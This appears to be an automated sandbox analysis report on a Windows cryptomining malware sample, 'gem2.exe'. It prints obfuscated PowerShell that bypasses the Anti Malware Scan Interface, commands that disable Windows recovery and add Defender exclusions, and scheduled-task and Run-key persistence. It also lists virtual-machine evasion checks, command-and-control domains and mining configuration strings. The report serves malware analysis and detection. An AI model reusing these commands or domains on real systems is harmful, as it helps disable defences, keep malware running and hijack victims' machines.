Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d5abccfd-b418-4ad6-92a2-7793c4b25dc9}Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\reagentc.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /grant administrators:F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
Source: C:\Users\user\Desktop\gem2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: gem2.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: gem2.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: gem2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\User\vcpkg\buildtrees\jsoncpp\x64-windows-rel\bin\jsoncpp.pdb source: svchost.exe, 00000010.00000002.2552768573.00000173CDFA3000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\7\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: svchost.exe, 00000010.00000002.2553572741.00000173CDFF5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: svchost.exe, 00000010.00000002.2553168813.00000173CDFE0000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\jsoncpp\x64-windows-rel\bin\jsoncpp.pdb%%" source: svchost.exe, 00000010.00000002.2552768573.00000173CDFA3000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: svchost.exe, 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: svchost.exe, 00000010.00000002.2554832457.00000173CF9BF000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 00000010.00000002.2557783221.00000173CFFDA000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: svchost.exe, 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: svchost.exe, 00000010.00000002.2554832457.00000173CF9BF000.00000002.10000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($scwfUeOSfALItM,$EtevswwRQwRAejVCuvR).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+'l');$TXsAOQOMQALSJtBsu=$kpBUoTRvoOegOC.Invoke($Nul
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'$'+''+'L'+''+'M'+''+[Char](88)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EtrMmUyKmezi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lQOtNkEZiwxXMY,[Parameter(Position=1)][Type]$pZbFqViXVD)$sbBqvXXfarI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+'od'+'u'+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'led'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sbBqvXXfarI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$lQOtNkEZiwxXMY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$sbBqvXXfarI.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99
)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tual',$pZbFqViXVD,$lQOtNkEZiwxXMY).SetImplementationFlags('Ru'+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $sbBqvXXfarI.CreateType();}$MoLktxqtnxyrW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019FE30 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,QueryPerformanceFrequency,16_2_00000173D019FE30
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_3_000001F5A966B0ED push rcx; retf 003Fh9_3_000001F5A966B0EE
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54B7DFB push rax; retf 14_2_00007FF6A54B7DFC
Source: C:\Windows\System32\svchost.exeCode function: 16_3_00000173D039B0ED push rcx; retf 003Fh16_3_00000173D039B0EE
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019CC0C push rdx; ret 16_2_00000173D019CC0D
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D019CC08 push rdi; retn 0004h16_2_00000173D019CC09
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1647DFB push rax; retf 17_2_00007FF7D1647DFC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC861A45 pushad ; iretd 31_2_00007FFAAC861AA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC8663FB push ebx; retf 0009h31_2_00007FFAAC86644A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC936A00 pushad ; ret 31_2_00007FFAAC936A01

Persistence and Installation Behavior

Source: unknown Executable created and started: C:\Windows\System32\System-f4855f59e0.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe File created: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe
Source: C:\Users\user\Desktop\gem2.exe File created: C:\Windows\System32\System-f4855f59e0.exe
Source: C:\Users\user\Desktop\gem2.exe File created: C:\Windows\SysWOW64\$LMX-f4855f59e0.exe
Source: C:\Users\user\Desktop\gem2.exe File created: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe

Boot Survival

Source: C:\Users\user\Desktop\gem2.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft-f4855f59e0
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\schtasks.exe SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3B230 IsProcessorFeaturePresent,terminate,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_00000173CFC3B230
Source: C:\Users\user\Desktop\gem2.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\gem2.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\explorer.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $LMXstager
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /grant administrators:F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\System-f4855f59e0.exeCode function: vmware.exe vboxservice.exe vboxservice.exe qemu-ga.exe qemu-ga.exe 14_2_00007FF6A54A7ED0
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: VMware VBOX QEMU QEMU 14_2_00007FF6A54A7B10
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: VMware QEMU QEMU 14_2_00007FF6A54A79C0
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: VBOX VMWARE 14_2_00007FF6A54A7CC0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: VMware VBOX QEMU QEMU 17_2_00007FF7D1637B10
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: VMware QEMU QEMU 17_2_00007FF7D16379C0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: vmware.exe vboxservice.exe vboxservice.exe qemu-ga.exe qemu-ga.exe 17_2_00007FF7D1637ED0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: VBOX VMWARE 17_2_00007FF7D1637CC0
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT serialnumber FROM Win32_DiskDrive
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drBinary or memory string: TEMP\.EXEWINDRIVE-.EXEC:\WINDOWS\SYSTEM32\SYSTEM-.EXEC:\WINDOWS\SYSWOW64\$LMX-SOFTWARE\$LMXCONFIG\STARTUPSYSWOW-.EXEC:\WINDOWS\SYSWOW64\$LMX-.EXEC:\PROGRAM FILES (X86)\MICROSOFT\TEMP\MICROSOFT-C:\PROGRAM FILES (X86)\MICROSOFT\TEMPSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNMICROSOFT-://HTTPSABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/HTTPS://PASTESNAP.COM/HTTPS://DEEPSEAHUNTER.COM.DE/HTTPS://PROJECTRETRAC.COM/HTTPS://BRETTDOGECOIN.COM/HTTPS://SYNCAICLOUD.COM/HTTPS://EONFORTNITE.COM/HTTPS://RUSTECHHUB.RU/HTTPS://CREATIVECODER.TOP/HTTPS://NAMESELL.SBS/HTTPS://LEARNTOCODEWITHUS.SU/HTTPS://BURNINGSPICE.CFD/HTTPS://SECURETEXTWEB.CC/HTTPS://WILDLIFY.COM/HTTPS://SPOKOYSTVIEIDUSHA.RU/HTTPS://ADOREBEAUTYZ.TOP/HTTPS://INDEXINFERNO.TOP/HTTPS://SUCCESSFROMWITHIN.RU/HTTPS://TECHVENTURESFROMRUSSIA.SU/HTTPS://INFORTE.TOP/HTTPS://YOURNEXTBIGIDEA.SU/HTTPS://BLUEBULLET.SU/HTTPS://FLIXMI.TOP/HTTPS://LEADINGWORLD.TOP/HTTPS://FEELGOODFOREVER.ORG.RU/HTTPS://RUSSIANTECHINNOVATIONHUB.RU/HTTPS://COOLCARFORUM.COM/HTTPS://RUSSIANCULTURALHERITAGE.RU/HTTPS://EXPLORERUSSIABEYOND.RU/HTTPS://WAVEPASSAGE.CFD/HTTPS://TIFFANYONLINESTORE.TOP/HTTPS://GALAXYGLIMMER.TOP/HTTPS://CODEMASTERSHUB.SU/HTTPS://LEARNTOCODEWITHUS.SU/HTTPS://GAMERGATEGAMES.TOP/HTTPS://JOBSCONTEXT.TOP/.EXEWINDRIVE-URL CHECKER:////.EXEC:\WINDOWS\SYSTEM32\SYSTEM-SYSTEM-" /SC ONLOGON /RL HIGHEST /F" /TR "SCHTASKS /CREATE /TN "SYSTEMMANUFACTURERHARDWARE\DESCRIPTION\SYSTEM\BIOSVMWAREVIRTUALBOXQEMUMICROSOFT CORPORATIONPARALLELS0SYSTEM\CURRENTCONTROLSET\SERVICES\DISK\ENUM0SYSTEM\CURRENTCONTROLSET\SERVICES\DISK\ENUMVMWAREVBOXQEMUVBOXVMWAREPARALLELSVMWARE.EXEVBOXSERVICE.EXEQEMU-GA.EXEHTTP://WWW.GOOGLE.COMPOWERSHELL.EXE -COMMAND "ADD-MPPREFERENCE -EXCLUSIONEXTENSION '.EXE'; ADD-MPPREFERENCE -EXCLUSIONPROCESS 'SVCHOST.EXE'"GLOBAL\E788D6624AWAITING FOR INTERNET 
CONNECTION...//M.TXTSTB/GLOBAL\F4855F59E0WAITING FOR INTERNET CONNECTION...//M.TXTSTB/TEMP\TM
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drBinary or memory string: QEMU-GA.EXE
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: CURL -S HTTP://IPINFO.IO/COUNTRYNVIDIAAMDNTDLL.DLLRTLGETVERSIONWINDOWS 11WINDOWS 10WINDOWS 8.1WINDOWS 8WINDOWS 7WINDOWS XPN/AEP.PHPAPI/10&STUB_VERSION=&OS_VERSION=&HAS_GPU=&STATUS=ONLINE&MINING_STATUS=&RAM_VRAM=&HARDWARE=&COUNTRY=&OWNER_ID=&HWID=&IP_ADDRESS=PC_NAME=HWID=E2D6CBD0E29B34BC6ADBD3513173B3B0D13F364FB7317D5F&API_KEY=DATA=&ID=GSS.PHP?API_KEY=TASKMGR.EXEPROCESSHACKER.EXEMSIAFTERBURNER.EXEHWMONITOR.EXERIVATUNER.EXEPROCESSEXPLORER.EXEGEFORCEEXPERIENCE.EXEGPU-Z.EXEXR.TXTPLD/HTTPKAWPOWFIROPOWWR.TXTNEXAETCHASHETHASHALEPHCTXCFLUXKARLSENV2PYRINV2EQUI144_5AUTOLYKOS2BEAMLR.TXT&SETTINGS_TYPE=GUS.PHP?API_KEY=5GB_GPU4GB_GPU_COIN_PORT:_POOL_WORKER%GPU%/_WALLETPROXY_HOSTPROXY_PORTPMWAPMWGRVNNEOXANEURAICLOREFIROETCETHWCORTEXKARLSENPYRINERGOBTGUNKNOWNCPUCPU_COINCPU_PORTCPU_POOLCPU_WORKERCPU_WALLETXMRRX/0ZEPHYRSALVIUMCPU_MAXCPU_IDLESOFTWARE\VALVE\STEAMRUNNINGAPPID --USER --URL " --ALGO " --PROXY= --CPU-MAX-THREADS-HINT=PMWA, USER IS IDLE NOT STARTING MINING.V.PHPTASK MANAGER OPENED, PAUSING MININGIDLE STATUS CHANGED, RESTARTING MINING PROCESS... --PROXY --URL STRATUM+TCP:// --POOL " --COIN --SOCKS5 --PERS BGOLDPOW&USER_ID=CIE.PHP?HWID=CU.PHP?API_KEY=\"GUW.PHP?ID=,
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: GetAdaptersInfo,14_2_00007FF6A54A7DA0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: GetAdaptersInfo,17_2_00007FF7D1637DA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5943
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3794
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1480
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4515
Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 584
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4151
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5848
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 6819
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 3091
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9863
Source: C:\Windows\System32\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_16-86225
Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\wbem\WmiPrvSE.exeAPI coverage: 5.2 %
Source: C:\Windows\System32\System-f4855f59e0.exeAPI coverage: 2.6 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 3.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 4240Thread sleep count: 79 > 30
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 4240Thread sleep time: -79000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3028Thread sleep count: 169 > 30
Source: C:\Windows\System32\svchost.exe TID: 3028Thread sleep time: -169000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 1480 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 4515 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 4308Thread sleep count: 584 > 30
Source: C:\Windows\System32\dllhost.exe TID: 4308Thread sleep time: -58400s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 5528Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep count: 4151 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep time: -4151000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep count: 5848 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1888Thread sleep time: -5848000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1928Thread sleep count: 6819 > 30
Source: C:\Windows\System32\lsass.exe TID: 1928Thread sleep time: -6819000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 1928Thread sleep count: 3091 > 30
Source: C:\Windows\System32\lsass.exe TID: 1928Thread sleep time: -3091000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2060Thread sleep count: 246 > 30
Source: C:\Windows\System32\svchost.exe TID: 2060Thread sleep time: -246000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 5188Thread sleep count: 9863 > 30
Source: C:\Windows\System32\dwm.exe TID: 5188Thread sleep time: -9863000s >= -30000s
Source: C:\Windows\System32\ReAgentc.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A968D880 FindFirstFileExW,9_2_000001F5A968D880
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FB848 FindFirstFileExW,14_2_00007FF6A54FB848
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC0A4A0 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,16_2_00000173CFC0A4A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03BD880 FindFirstFileExW,16_2_00000173D03BD880
